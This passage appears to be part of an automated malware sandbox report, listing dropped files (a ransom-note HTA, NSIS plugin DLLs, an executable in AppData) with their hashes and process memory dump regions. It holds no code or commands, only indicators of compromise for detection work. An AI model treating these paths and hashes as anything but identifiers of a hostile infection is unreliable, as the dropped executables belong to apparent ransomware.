                                                                                                      SHA256

                                                                                                      470d82dec3c67b3d319ac7774f4276de82a5c853c8c39bb626df0fe81d6a1859

                                                                                                      SHA512

                                                                                                      41394a2a6723fa4ad004dfc6713c98fa8df86e920fd2b787f0ccd6bc651ceaf601c335a7f294290aaf556d59e455cfd8f72bbf6d2a72422a7f0cf0a44da87882

                                                                                                    • C:\Users\Admin\Documents\!HELP_SOS.hta

                                                                                                      Filesize

                                                                                                      99KB

                                                                                                      MD5

                                                                                                      5d5680bb759ef6caf53b99e95bed7e43

                                                                                                      SHA1

                                                                                                      bdf67f25ee94040cf387f108f9e3f9004b32a608

                                                                                                      SHA256

                                                                                                      553f67916adb0dc0f369de28f1d0ccd24d247097dd8607a7c636d0166b8140b3

                                                                                                      SHA512

                                                                                                      6fd1cd32e6944518b40f412e549e25a786a20b8c976b67704f42eb109bfadd813a1a1f883908825d275f1d2724247c3c2bbf9efdd59101bb86d3e36f4f980b48

                                                                                                    • \Users\Admin\AppData\Local\Temp\nse429D.tmp\System.dll

                                                                                                      Filesize

                                                                                                      11KB

                                                                                                      MD5

                                                                                                      ca332bb753b0775d5e806e236ddcec55

                                                                                                      SHA1

                                                                                                      f35ef76592f20850baef2ebbd3c9a2cfb5ad8d8f

                                                                                                      SHA256

                                                                                                      df5ae79fa558dc7af244ec6e53939563b966e7dbd8867e114e928678dbd56e5d

                                                                                                      SHA512

                                                                                                      2de0956a1ad58ad7086e427e89b819089f2a7f1e4133ed2a0a736adc0614e8588ebe2d97f1b59ab8886d662aeb40e0b4838c6a65fbfc652253e3a45664a03a00

                                                                                                    • \Users\Admin\AppData\Local\Temp\nsj3CC4.tmp\INetC.dll

                                                                                                      Filesize

                                                                                                      21KB

                                                                                                      MD5

                                                                                                      92ec4dd8c0ddd8c4305ae1684ab65fb0

                                                                                                      SHA1

                                                                                                      d850013d582a62e502942f0dd282cc0c29c4310e

                                                                                                      SHA256

                                                                                                      5520208a33e6409c129b4ea1270771f741d95afe5b048c2a1e6a2cc2ad829934

                                                                                                      SHA512

                                                                                                      581351aef694f2489e1a0977ebca55c4d7268ca167127cefb217ed0d2098136c7eb433058469449f75be82b8e5d484c9e7b6cf0b32535063709272d7810ec651

                                                                                                    • \Users\Admin\AppData\Local\Temp\nso3CC4.tmp\System.dll

                                                                                                      Filesize

                                                                                                      11KB

                                                                                                      MD5

                                                                                                      3e6bf00b3ac976122f982ae2aadb1c51

                                                                                                      SHA1

                                                                                                      caab188f7fdc84d3fdcb2922edeeb5ed576bd31d

                                                                                                      SHA256

                                                                                                      4ff9b2678d698677c5d9732678f9cf53f17290e09d053691aac4cc6e6f595cbe

                                                                                                      SHA512

                                                                                                      1286f05e6a7e6b691f6e479638e7179897598e171b52eb3a3dc0e830415251069d29416b6d1ffc6d7dce8da5625e1479be06db9b7179e7776659c5c1ad6aa706

                                                                                                    • \Users\Admin\AppData\Local\Temp\nsy4451.tmp\System.dll

                                                                                                      Filesize

                                                                                                      11KB

                                                                                                      MD5

                                                                                                      a4dd044bcd94e9b3370ccf095b31f896

                                                                                                      SHA1

                                                                                                      17c78201323ab2095bc53184aa8267c9187d5173

                                                                                                      SHA256

                                                                                                      2e226715419a5882e2e14278940ee8ef0aa648a3ef7af5b3dc252674111962bc

                                                                                                      SHA512

                                                                                                      87335a43b9ca13e1300c7c23e702e87c669e2bcf4f6065f0c684fc53165e9c1f091cc4d79a3eca3910f0518d3b647120ac0be1a68eaade2e75eaa64adfc92c5a

                                                                                                    • \Users\Admin\AppData\Roaming\cl\cl.exe

                                                                                                      Filesize

                                                                                                      31KB

                                                                                                      MD5

                                                                                                      5bcabb6e0d1d6d2744798520f879851f

                                                                                                      SHA1

                                                                                                      fb14f8f983ebac4581b1feb813ef795b7f91f841

                                                                                                      SHA256

                                                                                                      5fafb92a6b4cc0061d6596dd9ddd730d21c6d0fd71e9ba0faf2dbac17eb4128f

                                                                                                      SHA512

                                                                                                      6ec23e136c7af54ec04dc2aef72d9232b32a6604669622ebb49435dbb74fdd2b089cf057afe44f277a3e2d2d7fdfcd87b9d3f0dc468823ab0aae254293483ad7

                                                                                                    • memory/764-305-0x0000000000400000-0x0000000000455000-memory.dmp

                                                                                                      Filesize

                                                                                                      340KB

                                                                                                    • memory/764-327-0x00000000002C0000-0x00000000002C6000-memory.dmp

                                                                                                      Filesize

                                                                                                      24KB

                                                                                                    • memory/764-322-0x0000000002AB0000-0x0000000002B79000-memory.dmp

                                                                                                      Filesize

                                                                                                      804KB

                                                                                                    • memory/764-323-0x0000000002B80000-0x0000000002C1F000-memory.dmp

                                                                                                      Filesize

                                                                                                      636KB

                                                                                                    • memory/764-324-0x0000000002C20000-0x0000000002D4D000-memory.dmp

                                                                                                      Filesize

                                                                                                      1.2MB

                                                                                                    • memory/764-325-0x00000000003B0000-0x00000000003CF000-memory.dmp

                                                                                                      Filesize

                                                                                                      124KB

                                                                                                    • memory/764-326-0x0000000003000000-0x0000000003109000-memory.dmp

                                                                                                      Filesize

                                                                                                      1.0MB

                                                                                                    • memory/764-303-0x0000000000400000-0x0000000000455000-memory.dmp

                                                                                                      Filesize

                                                                                                      340KB

                                                                                                    • memory/764-318-0x0000000000280000-0x0000000000289000-memory.dmp

                                                                                                      Filesize

                                                                                                      36KB

                                                                                                    • memory/764-317-0x0000000000400000-0x0000000000455000-memory.dmp

                                                                                                      Filesize

                                                                                                      340KB

                                                                                                    • memory/764-316-0x0000000000400000-0x0000000000455000-memory.dmp

                                                                                                      Filesize

                                                                                                      340KB

                                                                                                    • memory/764-315-0x000000007EFDE000-0x000000007EFDF000-memory.dmp

                                                                                                      Filesize

                                                                                                      4KB

                                                                                                    • memory/764-313-0x0000000000400000-0x0000000000455000-memory.dmp

                                                                                                      Filesize

                                                                                                      340KB

                                                                                                    • memory/764-311-0x0000000000400000-0x0000000000455000-memory.dmp

                                                                                                      Filesize

                                                                                                      340KB

                                                                                                    • memory/764-309-0x0000000000400000-0x0000000000455000-memory.dmp

                                                                                                      Filesize

                                                                                                      340KB

                                                                                                    • memory/764-307-0x0000000000400000-0x0000000000455000-memory.dmp

                                                                                                      Filesize

                                                                                                      340KB

                                                                                                    • memory/916-162-0x0000000000400000-0x000000000045A000-memory.dmp

                                                                                                      Filesize

                                                                                                      360KB

                                                                                                    • memory/916-268-0x0000000000400000-0x000000000045A000-memory.dmp

                                                                                                      Filesize

                                                                                                      360KB

                                                                                                    • memory/1080-288-0x0000000000400000-0x0000000000431000-memory.dmp

                                                                                                      Filesize

                                                                                                      196KB

                                                                                                    • memory/1480-301-0x0000000000440000-0x0000000000454000-memory.dmp

                                                                                                      Filesize

                                                                                                      80KB

                                                                                                    • memory/1576-262-0x0000000000400000-0x000000000045A000-memory.dmp

                                                                                                      Filesize

                                                                                                      360KB

                                                                                                    • memory/1636-275-0x0000000000400000-0x000000000045A000-memory.dmp

                                                                                                      Filesize

                                                                                                      360KB

                                                                                                    • memory/1744-160-0x0000000000CF0000-0x0000000000D24000-memory.dmp

                                                                                                      Filesize

                                                                                                      208KB

                                                                                                    • memory/1744-153-0x0000000000CF0000-0x0000000000D24000-memory.dmp

                                                                                                      Filesize

                                                                                                      208KB

                                                                                                    • memory/1948-158-0x0000000000400000-0x0000000000462000-memory.dmp

                                                                                                      Filesize

                                                                                                      392KB

                                                                                                    • memory/1948-59-0x0000000000400000-0x0000000000462000-memory.dmp

                                                                                                      Filesize

                                                                                                      392KB

                                                                                                    • memory/1992-705-0x0000000005230000-0x0000000005392000-memory.dmp

                                                                                                      Filesize

                                                                                                      1.4MB

                                                                                                    • memory/1992-706-0x0000000002B60000-0x0000000002B70000-memory.dmp

                                                                                                      Filesize

                                                                                                      64KB

                                                                                                    • memory/2512-38-0x0000000140000000-0x00000001405E8000-memory.dmp

                                                                                                      Filesize

                                                                                                      5.9MB

                                                                                                    • memory/2512-36-0x0000000140000000-0x00000001405E8000-memory.dmp

                                                                                                      Filesize

                                                                                                      5.9MB

                                                                                                    • memory/2512-37-0x0000000140000000-0x00000001405E8000-memory.dmp

                                                                                                      Filesize

                                                                                                      5.9MB

                                                                                                    • memory/2512-951-0x0000000140000000-0x00000001405E8000-memory.dmp

                                                                                                      Filesize

                                                                                                      5.9MB

                                                                                                    • memory/2512-950-0x0000000140000000-0x00000001405E8000-memory.dmp

                                                                                                      Filesize

                                                                                                      5.9MB

                                                                                                    • memory/2512-999-0x0000000140000000-0x00000001405E8000-memory.dmp

                                                                                                      Filesize

                                                                                                      5.9MB

                                                                                                    • memory/2512-996-0x0000000140000000-0x00000001405E8000-memory.dmp

                                                                                                      Filesize

                                                                                                      5.9MB

                                                                                                    • memory/2552-260-0x0000000000400000-0x000000000042D000-memory.dmp

                                                                                                      Filesize

                                                                                                      180KB

                                                                                                    • memory/2552-221-0x0000000000400000-0x000000000042D000-memory.dmp

                                                                                                      Filesize

                                                                                                      180KB

                                                                                                    • memory/2552-225-0x0000000000400000-0x000000000042D000-memory.dmp

                                                                                                      Filesize

                                                                                                      180KB

                                                                                                    • memory/2552-224-0x0000000000400000-0x000000000042D000-memory.dmp

                                                                                                      Filesize

                                                                                                      180KB

                                                                                                    • memory/2640-165-0x0000000000400000-0x0000000000431000-memory.dmp

                                                                                                      Filesize

                                                                                                      196KB

                                                                                                    • memory/2640-272-0x0000000000400000-0x0000000000431000-memory.dmp

                                                                                                      Filesize

                                                                                                      196KB

                                                                                                    • memory/2640-167-0x0000000000400000-0x0000000000431000-memory.dmp

                                                                                                      Filesize

                                                                                                      196KB

                                                                                                    • memory/2852-285-0x0000000000270000-0x000000000027E000-memory.dmp

                                                                                                      Filesize

                                                                                                      56KB

                                                                                                    • memory/2852-286-0x0000000001D50000-0x0000000001E71000-memory.dmp

                                                                                                      Filesize

                                                                                                      1.1MB

                                                                                                    • memory/2884-161-0x0000000000400000-0x000000000045A000-memory.dmp

                                                                                                      Filesize

                                                                                                      360KB

                                                                                                    • memory/2884-150-0x0000000000400000-0x000000000045A000-memory.dmp

                                                                                                      Filesize

                                                                                                      360KB

                                                                                                    • memory/2884-279-0x0000000000400000-0x000000000045A000-memory.dmp

                                                                                                      Filesize

                                                                                                      360KB

                                                                                                    • memory/2892-157-0x0000000000400000-0x0000000000498000-memory.dmp

                                                                                                      Filesize

                                                                                                      608KB

                                                                                                    • memory/2892-202-0x0000000000400000-0x0000000000498000-memory.dmp

                                                                                                      Filesize

                                                                                                      608KB

                                                                                                    • memory/2900-319-0x0000000000400000-0x0000000000457000-memory.dmp

                                                                                                      Filesize

                                                                                                      348KB

                                                                                                    • memory/2920-364-0x0000000000400000-0x000000000043D000-memory.dmp

                                                                                                      Filesize

                                                                                                      244KB

                                                                                                    • memory/2920-424-0x0000000000400000-0x000000000043D000-memory.dmp

                                                                                                      Filesize

                                                                                                      244KB

                                                                                                    • memory/2952-100-0x0000000000400000-0x000000000043E000-memory.dmp

                                                                                                      Filesize

                                                                                                      248KB

                                                                                                    • memory/2952-101-0x0000000000400000-0x000000000043E000-memory.dmp

                                                                                                      Filesize

                                                                                                      248KB

                                                                                                    • memory/2952-99-0x0000000000400000-0x000000000043E000-memory.dmp

                                                                                                      Filesize

                                                                                                      248KB